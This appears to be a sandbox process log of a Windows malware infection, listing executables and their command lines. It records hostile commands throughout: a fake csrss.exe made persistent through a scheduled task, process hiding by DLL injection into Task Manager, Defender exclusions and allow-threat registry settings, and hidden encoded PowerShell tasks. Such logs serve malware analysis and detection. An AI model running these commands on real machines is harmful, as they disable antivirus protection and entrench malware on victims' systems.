C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x426038,0x426044,0x426050
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\ulc.3.exe
"C:\Users\Admin\AppData\Local\Temp\ulc.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 768 -ip 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1552
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe
"C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe
.\Install.exe /nxdidQZJ "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe\" em /TIsite_iduEE 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe em /TIsite_iduEE 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDVVmaqMc" /SC once /ST 01:51:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDVVmaqMc"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDVVmaqMc"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 01:17:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe\" XT /dEsite_idNZT 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\DKanGUj.exe XT /dEsite_idNZT 385118 /S
